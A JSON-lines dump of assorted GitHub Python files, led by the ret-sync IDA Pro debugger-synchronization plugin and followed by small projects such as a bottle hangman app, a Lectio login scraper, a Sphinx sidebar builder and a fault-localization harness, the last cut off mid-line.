(via the broker and dispatcher)\n def go_notice(self):\n self.cmd_notice('go', descr='go')\n\n # send a go command (Ctrl-Alt-F5) to the debugger (via the broker and dispatcher)\n def run_notice(self):\n self.cmd_notice('run', descr='run')\n\n # send a single trace command (F11) to the debugger (via the broker and dispatcher)\n def si_notice(self):\n self.cmd_notice('si', descr='trace')\n\n # send a single step command (F10) to the debugger (via the broker and dispatcher)\n def so_notice(self):\n self.cmd_notice('so', descr='step')\n\n # send a notice message to the broker process\n def notice_broker(self, type, args=None):\n if not self.broker_sock:\n return\n\n if args:\n notice = \"[notice]{\\\"type\\\":\\\"%s\\\",%s}\\n\" % (type, args)\n else:\n notice = \"[notice]{\\\"type\\\":\\\"%s\\\"}\\n\" % (type)\n\n try:\n self.broker_sock.sendall(rs_encode(notice))\n except socket.error:\n None\n\n def stop(self):\n if self.broker_sock:\n self.broker_sock.close()\n self.broker_sock = None\n\n self.cb_restore_last_line()\n idaapi.refresh_idaview_anyway()\n self.is_active = False\n rs_log(\"idb is disabled\")\n\n def __init__(self, parser):\n self.color = False\n self.prev_loc = None\n self.prev_node = None\n self.name = idaapi.get_root_filename()\n self.base = idaapi.get_imagebase()\n rs_log(\"module base 0x%x\" % self.base)\n self.base_remote = None\n self.gm = GraphManager()\n self.hexsync = Syncrays()\n self.parser = parser\n self.broker_sock = None\n self.is_active = False\n self.dbg_dialect = None\n self.req_handlers = {\n 'broker': self.req_broker,\n 'loc': self.req_loc,\n 'cmd': self.req_cmd,\n 'cmt': self.req_cmt,\n 'rcmt': self.req_rcmt,\n 'fcmt': self.req_fcmt,\n 'raddr': self.req_raddr,\n 'rbase': 
self.req_rbase,\n 'cursor': self.req_cursor,\n 'patch': self.req_patch,\n 'rln': self.req_rln,\n 'rrln': self.req_rrln,\n 'lbl': self.req_lbl,\n 'bc': self.req_bc,\n 'bps_get': self.req_bps_get,\n 'bps_set': self.req_bps_set,\n 'modcheck': self.req_modcheck,\n 'dialect': self.req_set_dbg_dialect\n }\n self.prev_req = \"\" # used as a cache if json is not completely received\n\n\n# --------------------------------------------------------------------------\n\n\nclass Broker(QtCore.QProcess):\n\n QP_STATES = ('Not running', 'Starting', 'Running')\n QP_ERRORS = ('Failed to start', 'Crashed', 'Timedout',\n 'Read error', 'Write Error', 'Unknown Error')\n\n def cb_on_error(self, error):\n rs_log(\"[-] broker error: %s\" % Broker.QP_ERRORS[error])\n\n def cb_broker_on_state_change(self, new_state):\n rs_debug(\"broker new state: %s\" % Broker.QP_STATES[new_state])\n if Broker.QP_STATES[new_state] == 'Not running':\n if rsconfig.LOG_TO_FILE_ENABLE:\n rs_log(' check tmp file retsync..err if you think this is an error')\n\n def cb_broker_on_out(self):\n # readAllStandardOutput() returns QByteArray\n data = rs_decode(self.readAllStandardOutput().data())\n batch = data.split('\\n')\n for req in batch:\n self.worker.parse_exec(req.strip())\n\n def __init__(self, parser):\n QtCore.QProcess.__init__(self)\n\n self.error.connect(self.cb_on_error)\n self.readyReadStandardOutput.connect(self.cb_broker_on_out)\n self.stateChanged.connect(self.cb_broker_on_state_change)\n\n # create a request handler\n self.worker = RequestHandler(parser)\n\n# --------------------------------------------------------------------------\n\n\nclass DbgDirHlpr(object):\n\n @staticmethod\n def read_rsds_guid():\n guid = None\n penode = idaapi.netnode()\n penode.create(idautils.peutils_t.PE_NODE)\n rsds = penode.getblob(0, \"s\")\n\n if rsds and rsds.startswith(b'RSDS'):\n guid = (\"%s\" % uuid.UUID(bytes_le=rsds[4:20])).upper()\n\n return guid\n\n @staticmethod\n def read_rsds_pdb():\n penode = idaapi.netnode()\n PE_SUPSTR_PDBNM = idautils.peutils_t.PE_ALT_DBG_FPOS - 8\n penode.create(idautils.peutils_t.PE_NODE)\n pdbname = penode.supstr(PE_SUPSTR_PDBNM, 'S')\n return pdbname\n\n @staticmethod\n def parse_itoldyouso_output(res):\n for line in res.splitlines(True):\n line = line.strip()\n if line.startswith('pdb sig: '):\n return (line.split(':')[-1]).strip()\n return None\n\n\n# --------------------------------------------------------------------------\n\n\nclass GraphManager():\n\n def __init__(self):\n self.prev_node = None\n self.graph_viewer = ida_kernwin.get_current_viewer()\n\n def center(self):\n curnode = ida_graph.viewer_get_curnode(self.graph_viewer)\n\n if not (self.prev_node == curnode):\n ida_graph.viewer_center_on(self.graph_viewer, curnode)\n self.prev_node = curnode\n\n return curnode\n\n\n# --------------------------------------------------------------------------\n\n\nclass CheckBoxActionHandler(idaapi.action_handler_t):\n def __init__(self, cb):\n idaapi.action_handler_t.__init__(self)\n self.cb = cb\n\n def activate(self, ctx):\n self.cb.toggle()\n return 1\n\n def update(self, ctx):\n return idaapi.AST_ENABLE_ALWAYS\n\n\n# --------------------------------------------------------------------------\n\n\nclass CmdHook(ida_kernwin.UI_Hooks):\n\n def __init__(self):\n idaapi.UI_Hooks.__init__(self)\n self.hooked = {}\n self.bugfixed = False\n\n # 74sp1 BUGFIX: IDAPython: ida_kernwin.UI_Hooks.preprocess_action()\n # wouldn't allow inhibiting the action\n pattern = re.compile('preprocess_action\\(self, name\\) -> 
int')\n if pattern.search(ida_kernwin.UI_Hooks.preprocess_action.__doc__):\n self.bugfixed = True\n\n def minver74sp1(self):\n # idaapi.IDA_SDK_VERSION >= 740:\n return self.bugfixed\n\n def add_hook(self, action_name, callback):\n self.hooked[action_name] = callback\n\n def del_hook(self, action_name):\n del self.hooked[action_name]\n\n def preprocess_action(self, action_name):\n if action_name not in self.hooked:\n return 0\n\n self.hooked[action_name]()\n return 1\n\n\n# --------------------------------------------------------------------------\n\n\nclass SyncForm_t(PluginForm):\n\n hotkeys_ctx = []\n cmd_hooks = CmdHook()\n\n def cb_broker_started(self):\n rs_log(\"broker started\")\n self.btn.setText(\"Restart\")\n\n def cb_broker_finished(self):\n rs_log(\"broker finished\")\n self.uninit_hotkeys()\n if self.broker:\n self.broker.worker.stop()\n self.cb_sync.stateChanged.disconnect(self.cb_change_state)\n self.cb_sync.toggle()\n self.cb_sync.stateChanged.connect(self.cb_change_state)\n\n self.btn.setText(\"Start\")\n\n # send a kill notice to the broker\n # wait at most 2sec for him to gently kill itself\n def smooth_kill(self):\n self.uninit_hotkeys()\n if self.broker:\n broker = self.broker\n self.broker = None\n broker.worker.cb_restore_last_line()\n broker.worker.kill_notice()\n broker.waitForFinished(1500)\n\n def init_broker(self):\n rs_debug(\"init_broker\")\n modname = self.input.text()\n if modname == \"\":\n modname = self.handle_name_aliasing()\n self.input.setText(modname)\n\n cmdline = \"\\\"%s\\\" -u \\\"%s\\\" --idb \\\"%s\\\"\" % (\n PYTHON_PATH,\n BROKER_PATH,\n modname)\n rs_log(\"cmdline: %s\" % cmdline)\n\n try:\n self.broker = Broker(self.parser)\n self.broker.started.connect(self.cb_broker_started)\n self.broker.finished.connect(self.cb_broker_finished)\n self.broker.start(cmdline)\n except Exception as e:\n rs_log(\"[-] failed to start broker: %s\\n%s\" % (str(e), traceback.format_exc()))\n return\n\n self.broker.worker.name = modname\n\n def init_hotkeys(self):\n hotkeys_info = (\n ('F2', self.broker.worker.bp_notice, 'BreakpointToggle'),\n ('F3', self.broker.worker.bp_oneshot_notice),\n ('F10', self.broker.worker.so_notice),\n ('F11', self.broker.worker.si_notice, 'FullScreen'),\n ('Ctrl-F1', self.broker.worker.export_bp_notice, 'ExternalHelp'),\n ('Ctrl-F2', self.broker.worker.hbp_notice),\n ('Ctrl-F3', self.broker.worker.hbp_oneshot_notice),\n ('Alt-F2', self.broker.worker.translate_notice, 'ManualInstruction'),\n ('Alt-F5', self.broker.worker.go_notice),\n ('Ctrl-Alt-F5', self.broker.worker.run_notice),\n )\n\n if not self.hotkeys_ctx:\n for hk_info in hotkeys_info:\n self.init_single_hotkey(*hk_info)\n\n # enable ida_kernwin.UI_Hooks\n if self.cmd_hooks.minver74sp1():\n self.cmd_hooks.hook()\n\n def init_single_hotkey(self, key, fnCb, conflict=None):\n if conflict:\n if self.cmd_hooks.minver74sp1():\n # 'hook' existing action shortcut when possible\n self.cmd_hooks.add_hook(conflict, fnCb)\n return\n else:\n # 'mute' existing action shortcut\n ida_kernwin.update_action_shortcut(conflict, None)\n\n ctx = idaapi.add_hotkey(key, fnCb)\n if ctx is None:\n rs_log(\"failed to register hotkey %s\" % key)\n del ctx\n else:\n self.hotkeys_ctx.append((ctx, key, conflict))\n\n def uninit_hotkeys(self):\n # disable ida_kernwin.UI_Hooks\n if self.cmd_hooks.minver74sp1():\n self.cmd_hooks.unhook()\n\n if not self.hotkeys_ctx:\n return\n\n # delete registered context and restore original action\n for ctx, key, conflict in self.hotkeys_ctx:\n if idaapi.del_hotkey(ctx):\n 
del ctx\n else:\n rs_log(\"failed to delete hotkey %s\" % key)\n\n if conflict and not self.cmd_hooks.minver74sp1():\n ida_kernwin.update_action_shortcut(conflict, key)\n\n self.hotkeys_ctx = []\n\n def cb_btn_restart(self):\n rs_log('restarting broker')\n if self.cb_sync.checkState() == QtCore.Qt.Checked:\n self.cb_sync.toggle()\n time.sleep(0.1)\n self.cb_sync.toggle()\n\n def cb_change_state(self, state):\n if state == QtCore.Qt.Checked:\n rs_log(\"sync enabled\")\n # Restart broker\n self.hotkeys_ctx = []\n self.init_broker()\n else:\n if self.broker:\n self.smooth_kill()\n rs_log(\"sync disabled\\n\")\n\n def cb_hexrays_sync_state(self, state):\n if self.broker:\n if state == QtCore.Qt.Checked:\n rs_log(\"hexrays sync enabled\\n\")\n self.broker.worker.hexsync.enable()\n else:\n rs_log(\"hexrays sync disabled\\n\")\n self.broker.worker.hexsync.disable()\n\n def cb_hexrays_toggle(self):\n self.cb_hexrays.toggle()\n\n # issue a warning if pdb name is different from\n # the name used to register the idb to the dispatcher\n def pdb_name_warning(self, name):\n pdbpath = DbgDirHlpr.read_rsds_pdb()\n if not pdbpath:\n return\n\n normpath = os.path.normpath(pdbpath.replace(\"\\\\\", \"\\\\\\\\\"))\n pdb_root, pdb_ext = os.path.splitext(os.path.basename(normpath))\n mod_root, mod_ext = os.path.splitext(name)\n\n if pdb_root.strip() != mod_root.strip():\n rs_log(\"hint: pdb name ('%s') differs from registered module name ('%s')\" % (pdb_root+mod_ext, name))\n\n # discover the name used to expose the idb, default is from get_root_filename\n # alias can be defined in '.sync' configuration file\n def handle_name_aliasing(self):\n name = idaapi.get_root_filename()\n rs_log(\"default idb name: %s\" % name)\n\n try:\n conf = load_configuration(name)\n if conf.path:\n rs_log(\"found config file: %s\" % repr(conf))\n if conf.alias:\n name = conf.alias\n rs_log(\"overwrite idb name with %s\" % name)\n except Exception as e:\n rs_log('failed to load configuration file')\n\n self.pdb_name_warning(name)\n return name\n\n def OnCreate(self, form):\n rs_debug(\"form create\")\n\n # get parent widget\n parent = self.FormToPyQtWidget(form)\n\n # create global sync checkbox\n self.cb_sync = QtWidgets.QCheckBox('Synchronization enable')\n self.cb_sync.move(20, 20)\n self.cb_sync.stateChanged.connect(self.cb_change_state)\n\n # create hexrays sync checkbox\n self.cb_hexrays = QtWidgets.QCheckBox('Hex-Rays Synchronization enable')\n self.cb_hexrays.move(20, 20)\n self.cb_hexrays.stateChanged.connect(self.cb_hexrays_sync_state)\n\n # create label\n label = QtWidgets.QLabel('Overwrite idb name:')\n name = self.handle_name_aliasing()\n\n # create input field\n self.input = QtWidgets.QLineEdit(parent)\n self.input.setText(name)\n self.input.setMaxLength(256)\n self.input.setFixedWidth(300)\n\n # create restart button\n self.btn = QtWidgets.QPushButton('restart', parent)\n self.btn.setToolTip('Restart broker.')\n self.btn.clicked.connect(self.cb_btn_restart)\n\n # create layout\n layout = QtWidgets.QGridLayout()\n layout.addWidget(self.cb_sync)\n layout.addWidget(self.cb_hexrays)\n layout.addWidget(label)\n layout.addWidget(self.input)\n layout.addWidget(self.btn, 2, 2)\n layout.setColumnStretch(4, 1)\n layout.setRowStretch(4, 1)\n parent.setLayout(layout)\n\n self.parser = argparse.ArgumentParser()\n self.parser.add_argument('-a', '--address', nargs=1, action='store')\n self.parser.add_argument('msg', nargs=argparse.REMAINDER)\n\n # synchronization is enabled by default\n self.cb_sync.toggle()\n\n # register action 
for hexrays sync\n action_hex_sync_desc = idaapi.action_desc_t(\n 'hexrays_sync_toogle:action',\n 'Toggle Hex-Rays syncing',\n CheckBoxActionHandler(self.cb_hexrays),\n 'Ctrl+H',\n 'Toggle Hex-Rays syncing',\n 198)\n\n idaapi.register_action(action_hex_sync_desc)\n idaapi.attach_action_to_toolbar(\n \"DebugToolBar\",\n 'hexrays_sync_toogle:action')\n\n # register action for global sync\n action_g_sync_desc = idaapi.action_desc_t(\n 'g_sync_toogle:action',\n 'Toggle syncing',\n CheckBoxActionHandler(self.cb_sync),\n 'Ctrl+Shift+S',\n 'Toggle syncing',\n 203)\n\n idaapi.register_action(action_g_sync_desc)\n idaapi.attach_action_to_toolbar(\n \"DebugToolBar\",\n 'g_sync_toogle:action')\n\n def OnClose(self, form):\n rs_debug(\"form close\")\n self.smooth_kill()\n\n idaapi.unregister_action('hexrays_sync_toogle:action')\n idaapi.detach_action_from_toolbar(\n \"DebugToolBar\",\n 'hexrays_sync_toogle:action')\n\n idaapi.unregister_action('g_sync_toogle:action')\n idaapi.detach_action_from_toolbar(\n \"DebugToolBar\",\n 'g_sync_toogle:action')\n\n global SyncForm\n del SyncForm\n SyncForm = None\n\n def Show(self):\n return PluginForm.Show(self, \"ret-sync\", options=PluginForm.WOPN_PERSIST)\n\n\n# --------------------------------------------------------------------------\n\n\nclass RetSyncPlugin(idaapi.plugin_t):\n flags = idaapi.PLUGIN_PROC\n comment = 'Reverse-Engineering Tools synchronization, ret-sync .'\n help = 'Synchronize a debugging session with IDA.'\n wanted_name = 'ret-sync'\n wanted_hotkey = 'Alt-Shift-S'\n global SyncForm\n SyncForm = None\n\n def init(self):\n return idaapi.PLUGIN_KEEP\n\n def term(self):\n pass\n\n def run(self, arg):\n if not idaapi.get_root_filename():\n rs_log('please load a file/idb before')\n return\n\n global SyncForm\n if not SyncForm:\n SyncForm = SyncForm_t()\n SyncForm.Show()\n rs_log(\"plugin loaded\")\n\n\ndef PLUGIN_ENTRY():\n return RetSyncPlugin()\n\n\nif __name__ == \"__main__\":\n rs_log(\"ret-sync is an IDA Pro plugin, please see README for installation notes\")\n","repo_name":"bootleg/ret-sync","sub_path":"ext_ida/SyncPlugin.py","file_name":"SyncPlugin.py","file_ext":"py","file_size_in_byte":40801,"program_lang":"python","lang":"en","doc_type":"code","stars":1779,"dataset":"github-code","pt":"31"} +{"seq_id":"20729955738","text":"def make_sudoku(size=1):\r\n res=[]\r\n c=0\r\n q=0\r\n n=range(1,size*size+1,1)\r\n while len(res)<(size*size):\r\n if len(res)%size==0:\r\n c=0\r\n q=q+1\r\n line= n[(size*c)+q:]+n[:(size*c)+q]\r\n res.append(line)\r\n c=c+1\r\n return res\r\n","repo_name":"bada02/Prometheus","sub_path":"Prometheus/83.py","file_name":"83.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"42598840592","text":"import psycopg2\r\n\r\nconnection = psycopg2.connect('dbname=postgres user=postgres password=1234')\r\n\r\ncursor = connection.cursor()\r\n\r\ncursor.execute('DROP TABLE IF EXISTS table2;')\r\ncursor.execute('''\r\nCREATE TABLE table2 (\r\nid INTEGER PRIMARY KEY,\r\ncompleted BOOLEAN NOT NULL DEFAULT False\r\n);\r\n''')\r\n#list comprehensive\r\ncursor.execute('INSERT INTO table2 (id, completed) values(%s, %s);', (1, True))\r\n#dictionanry\r\nSQL = 'INSERT INTO table2 (id, completed) values(%(id)s, %(completed)s);'\r\ndata = {'id':2, 'completed': False}\r\ncursor.execute(SQL, data)\r\n\r\n#print out the query result\r\ncursor.execute('SELECT * from table2;')\r\nresult = cursor.fetchall()\r\nprint(result)\r\n#after fetch all, if 
you want to fetch one, there will be nothing left to be fetched\r\n\r\nconnection.commit()\r\n\r\ncursor.close()\r\nconnection.close()","repo_name":"warriorcoding/database-model","sub_path":"testdb.py","file_name":"testdb.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
+{"seq_id":"2536630412","text":"import bottle, model, random\n\n# Only needed if the editor has a higher-level path open.\n#import os\n#os.chdir('UvP/Vislice')\n\nLOGO = r'''\n____ ____.__ .__ .__ \n\\ \\ / /|__| _____| | |__| ____ ____ \n \\ Y / | |/ ___/ | | |/ ___\\/ __ \\ \n \\ / | |\\___ \\| |_| \\ \\__\\ ___/ \n \\___/ |__/______>____/__|\\_____>_____>\n \n'''\nID_IGRE_COOKIE_NAME = 'id_igre'\nCOOKIE_SECRET = 'my very special - secret key and passphrase'\nDATOTEKA_S_STANJEM = 'stanje.json'\nDATOTEKA_Z_BESEDAMI = 'besede.txt'\n\n# Create a new hangman object and load its state from the file\nvislice = model.Vislice(DATOTEKA_S_STANJEM, DATOTEKA_Z_BESEDAMI)\nvislice.nalozi_igre_iz_datoteke()\n\n\n@bottle.get('/')\ndef index():\n return bottle.template('index.tpl')\n\n\n@bottle.post('/nova_igra/')\ndef nova_igra():\n id_nove_igre = vislice.nova_igra()\n bottle.response.set_cookie(\n ID_IGRE_COOKIE_NAME, str(id_nove_igre),\n path='/',\n secret=COOKIE_SECRET\n )\n\n bottle.redirect('/igra/')\n\n\n@bottle.get('/igra/')\ndef pokazi_igro():\n id_igre = bottle.request.get_cookie(\n ID_IGRE_COOKIE_NAME,\n secret=COOKIE_SECRET\n )\n igra, poskus = vislice.igre[id_igre]\n\n return bottle.template('igra.tpl',\n igra=igra, poskus=poskus, id_igre=id_igre)\n\n\n@bottle.post('/igra/')\ndef ugibaj():\n id_igre = bottle.request.get_cookie(\n ID_IGRE_COOKIE_NAME,\n secret=COOKIE_SECRET\n )\n\n crka = bottle.request.forms.getunicode('crka')\n \n if len(crka) != 1 or not crka.isalpha():\n bottle.redirect('/igra/')\n else:\n vislice.ugibaj(id_igre, crka)\n bottle.redirect('/igra/')\n\n\n# Statistics\n@bottle.get('/statistika/')\ndef pokazi_statistiko():\n slovar_statistik = model.statistika(DATOTEKA_S_STANJEM)\n return bottle.template('statistika.tpl', slovar_statistik=slovar_statistik)\n\n\n# Images\n@bottle.get('/img/<slika>')\ndef serve_pictures(slika):\n return bottle.static_file(slika, root='img')\n\n\n\nbottle.run(debug=True, reloader=True)\n","repo_name":"matejbolta/vislice","sub_path":"vislice.py","file_name":"vislice.py","file_ext":"py","file_size_in_byte":2051,"program_lang":"python","lang":"sl","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
+{"seq_id":"23177067658","text":"'''\r\nCreated on Jun 26, 2015 Fri - 22:58:49\r\n\r\n@author: LKumaresan\r\n'''\r\n\r\nfrom PyQt5 import QtCore, QtGui, QtWidgets\r\nfrom user_interface.win_main import Ui_MainWindow\r\nimport sys\r\nimport os\r\n#from kmxPyQt.qne import qnodeseditor\r\nfrom kmxPyQt.qne.qnodeseditor import QNodesEditor\r\n\r\nclass WinMain(QtWidgets.QMainWindow, Ui_MainWindow):\r\n '''\r\n classdocs\r\n '''\r\n\r\n def __init__(self, parent):\r\n '''\r\n Constructor\r\n '''\r\n QtWidgets.QMainWindow.__init__(self)\r\n self.setupUi(self)\r\n self.parent = parent\r\n self.connectSignalSlots()\r\n self.createScene()\r\n\r\n def connectSignalSlots(self):\r\n #self.btnPropApply.clicked.connect(self.parent.btnClickHere)\r\n pass\r\n \r\n def createScene(self):\r\n self.scene = QtWidgets.QGraphicsScene(self)\r\n bgcolor = QtWidgets.QApplication.palette().color(QtGui.QPalette.Window)\r\n self.scene.setBackgroundBrush(QtGui.QBrush(bgcolor, QtCore.Qt.SolidPattern))\r\n 
self.graphicsView.setScene(self.scene)\r\n\r\n\r\nif __name__ == '__main__':\r\n app = QtWidgets.QApplication(sys.argv)\r\n m = WinMain(app)\r\n m.show()\r\n sys.exit(app.exec_())\r\n \r\n","repo_name":"kaymatrix/our-py-lib","sub_path":"pepper/src/interface_runner/win_main.py","file_name":"win_main.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"38925801780","text":"import urllib\nimport requests\nfrom bs4 import BeautifulSoup as Soup\nimport urls\nimport functions\n\ndef authenticate (config):\n url = urls.login_url.replace(\"{{SCHOOL_ID}}\", config.school_id).replace(\"{{BRANCH_ID}}\", config.branch_id)\n\n # Retrieve the base information, to retrieve ViewState\n base = requests.get(url)\n soup = Soup(base.text)\n\n headers = {\n \"User-Agent\" : \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2\",\n \"Content-Type\" : \"application/x-www-form-urlencoded\",\n \"Referer\" : url,\n \"Host\" : \"www.lectio.dk\",\n \"Origin\" : \"https://www.lectio.dk\",\n \"Accept\" : \"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\"\n }\n\n # Insert validation information\n eventValidationTest = soup.find(id=\"aspnetForm\").find(id=\"__EVENTVALIDATION\")[\"value\"]\n\n eventValidation = urllib.urlencode({\"__EVENTVALIDATION\" : eventValidationTest})\n\n #viewS = \"8AAAAGlpZQotMjMxNTQyMTExaWwEawBnAWsBZwFsAmhpZGwCZwJpbAJrAmUDb2ZmbAJnA2lkbAJnAWlkbAJnBWlkbAJnBWlkbARoaWRsAmcDaWRsBmcBaWwCawNlNUhUWCBTdWtrZXJ0b3BwZW4gLSBLJiMyNDg7YmVuaGF2bnMgVGVrbmlza2UgR3ltbmFzaXVtZGcFaWRsAmcBaWRsAmhpbAJrBGUCNTBkZwdpZGwCZwFpZGwCaGlqaWwCawVwZGRkZGcBaWRsAmcDaWlsAmsGZzJkZHIBZRFtJENvbnRlbnQkTG9naW5NVmlpZGhkBwAAAAlMb2dpblZpZXcTVmFsaWRhdGVSZXF1ZXN0TW9kZQxhdXRvY29tcGxldGUJaW5uZXJodG1sCW1heGxlbmd0aAdDaGVja2VkCU1heExlbmd0aAAj19IUcjRcRxl5n5r%2BQAW3cK1O1g%3D%3D\"\n\n viewS = urllib.urlencode({\"__VIEWSTATEX\" : soup.find(id=\"__VIEWSTATEX\")[\"value\"]})\n\n #viewS = soup.find(id=\"__VIEWSTATEX\")[\"value\"]\n\n eventV = eventValidation\n\n #response = requests.post(url, data=\"m%24Content%24username2=\"+config.username.strip()+\"&m%24Content%24password2=\"+config.password.strip()+\"&time=0&__EVENTARGUMENT=&__VIEWSTATE=&\"+eventValidation+\"&__EVENTTARGET=m%24Content%24submitbtn2&__VIEWSTATEX=\"+soup.find(id=\"__VIEWSTATEX\")[\"value\"],headers=headers, allow_redirects=True)\n response = requests.post(url, data=\"m%24Content%24username2=\"+config.username.strip()+\"&m%24Content%24password2=\"+config.password.strip()+\"&time=0&__EVENTARGUMENT=&__VIEWSTATE=&\"+eventV+\"&__EVENTTARGET=m%24Content%24submitbtn2&\"+viewS,headers=headers, allow_redirects=False)\n\n if \"LastLoginUserName\" in response.cookies:\n return response.cookies\n else:\n return False","repo_name":"IllutionSoft/MyCalendarAPI","sub_path":"LectioAPI/authenticate.py","file_name":"authenticate.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"9995150201","text":"from django.shortcuts import render, redirect\nfrom .models import Episode\nfrom django.core.paginator import Paginator\n\n# Create your views here.\n\ndef index(request):\n if request.method == 'GET':\n search = request.GET.get('search', '')\n episodes = Episode.objects.filter(title__icontains=search).order_by('-published')\n paginator = Paginator(episodes, per_page=10) \n page_number = request.GET.get('page')\n page_obj = 
paginator.get_page(page_number)\n context = { \n 'episodes':page_obj, \n }\n return render(request, 'index.html', context)\n\n\n ","repo_name":"jainmonil2101/django-podcast-aggregator","sub_path":"podcast/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
+{"seq_id":"30859524740","text":"# DON'T MOVE ME, OTHER REPO'S READTHEDOCS BUILDS DEPEND ON ME STAYING IN THIS DIRECTORY\n#\n# This file was written to build a shared readthedocs sidebar on the sovrin.readthedocs.io website. \n# \n# In each of the sovrin repo's docs folders, there exists a conf.py to be used when building documentation \n# with sphinx. When our docs are built with readthedocs, the conf.py executes. There are a couple of lines \n# in the conf.py that will clone and use this file to generate a shared sidebar that includes all of the repos\n# listed below on the readthedocs website. \n# \n# There is almost certainly a better way to do this, but I have yet to figure that out. Please submit a PR \n# against this repository if you would like to help make this process more elegant.\nimport os\ndef write_if_changed(fname, contents):\n \n try:\n with open(fname, 'r') as fp:\n old_contents = fp.read()\n except:\n old_contents = ''\n \n if old_contents != contents:\n with open(fname, 'w') as fp:\n fp.write(contents)\n\n\n\n\ndef generate_sidebar(conf, conf_api):\n # determine 'latest' or 'stable'\n # if not conf.do_gen:\n do_gen = os.environ.get('SIDEBAR', None) == '1' or conf['on_rtd']\n version = conf['rtd_version']\n \n lines = [\n '', '.. DO NOT MODIFY! THIS PAGE IS AUTOGENERATED!', ''\n ]\n def toctree(name, depth):\n lines.extend(['.. toctree::',\n ' :caption: %s' % name,\n ' :maxdepth: %d' % depth,\n ''])\n\n def endl():\n lines.append('')\n\n def write_local_page(desc, link):\n if conf_api == 'sovrin':\n args = desc, link\n else:\n args = desc, 'https://sovrin-foundation.readthedocs.io/en/%s/%s.html' % (version, link)\n \n lines.append(' %s <%s>' % args)\n\n def write_subproject(project, desc, link):\n if project != conf_api:\n args = desc, project, version, link\n lines.append(' %s <https://%s.readthedocs.io/en/%s/%s.html>' % args)\n else:\n lines.append(' %s <%s>' % (desc, link))\n \n def write_link(desc, link):\n lines.append(' %s <%s>' % (desc, link))\n\n def write_page_title(title):\n lines.append(title)\n header_bar = '='\n for i in range(0,len(title)):\n header_bar += '=' \n lines.append(header_bar)\n\n\n write_page_title('Sovrin')\n \n # Begin creating sidebar\n toctree('Sovrin', 2)\n write_local_page('Introduction', 'index')\n write_local_page('Build Script', 'build-scripts/ubuntu-1604/README')\n write_local_page('Release Notes', 'release-notes')\n\n toctree('Sovrin Repositories', 2)\n write_subproject('connector-app', 'Connector App', 'index')\n toctree('External Documentation', 1)\n write_link('Hyperledger Indy', 'https://hyperledger-indy.readthedocs.io')\n endl()\n\n write_if_changed('toc.rst', '\\n'.join(lines))\n\ndef get_intersphinx_mapping(version):\n return {\n 'indy': ('http://indy.readthedocs.io/en/%s/' % version, None),\n 'indy-sdk': ('http://indy-sdk.readthedocs.io/en/%s/' % version, None),\n 'indy-node': ('http://indy-node.readthedocs.io/en/%s/' % version, None),\n 'indy-agent': ('http://indy-agent.readthedocs.io/en/%s' % version, None),\n 'indy-plenum': ('http://indy-plenum.readthedocs.io/en/%s' % version, None),\n 'indy-hipe': ('http://hipe.readthedocs.io/en/%s' % version, None),\n 
}","repo_name":"sovrin-foundation/sov-docs-conf","sub_path":"remote_conf.py","file_name":"remote_conf.py","file_ext":"py","file_size_in_byte":3520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74997282967","text":"# Attention: only are c/c++/py supported!!!\nfrom TestingTools.ctest import CTesting\nfrom TestingTools.pytest import PythonTesting\nfrom Debugger import Crosstab, Tarantula, LineCoverage, Jaccard, Ochiai, RBF\n#import Crosstab, Tarantula, LineCoverage, Jaccard, Ochiai, RBF\n\nclass FaultStorage:\n def __init__(self, srccode):\n self.srccode = srccode\n self.records = []\n self.tempstorage = []\n file = open(srccode)\n self.lines = len(file.readlines())\n file.close()\n if self.srccode.endswith('.py'):\n self.type = 'python'\n self.py = PythonTesting(srccode)\n elif self.srccode.endswith('.c') or self.srccode.endswith('.cpp'):\n self.type = 'c'\n self.c = CTesting(srccode)\n else:\n raise Exception(\"We are not supported for this code debugging. \")\n\n def Test(self, inputcase, outputpath):\n #print(inputcase, \" \" , outputpath)\n if self.type == 'python':\n #print(type(self.py))\n self.tempstorage = self.py.Test(inputcase, outputpath)\n #print(self.tempstorage)\n elif self.type == 'c':\n self.tempstorage = self.c.Test(inputcase, outputpath)\n else:\n print(\"We are not supported for this code debugging. Coming soon. \")\n return\n \n def EndTest(self):\n if self.type == 'python':\n self.py.Delete()\n elif self.type == 'c':\n self.c.Delete()\n\n def ResultRecord(self, result):\n temp = [result]\n temp.extend(self.tempstorage)\n self.records.append(temp)\n self.tempstorage = []\n \n def GenerateTarantula(self):\n return Tarantula.rankBySuspiciousness(LineCoverage.getLineCoverage(self.lines, self.records))\n\n def GenerateCrosstab(self):\n return Crosstab.rankBySuspiciousness(LineCoverage.getLineCoverage(self.lines, self.records))\n\n def GenerateJaccard(self):\n return Jaccard.rankBySuspiciousness(LineCoverage.getLineCoverage(self.lines, self.records))\n\n def GenerateOchiai(self):\n return Ochiai.rankBySuspiciousness(LineCoverage.getLineCoverage(self.lines, self.records))\n\n def GenerateRBF(self):\n CoverageMatrix, CoverageLabel=LineCoverage.getLineCoverageMatrix(self.lines, self.records)\n return RBF.RBF(CoverageMatrix, CoverageLabel)\n","repo_name":"EririSawamura/Debugging-tools-for-cpp-python","sub_path":"Sourcecode/Fault.py","file_name":"Fault.py","file_ext":"py","file_size_in_byte":2359,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"9000089690","text":"import os\nimport shutil\nimport wget\nimport glob\nimport common_config\n\nlabels = common_config.model_config[\"labels\"]\n\nif not os.path.exists(common_config.ANNOTATION_PATH):\n os.mkdir(common_config.ANNOTATION_PATH)\n\nwith open(f'{common_config.ANNOTATION_PATH}/label_map.pbtxt', 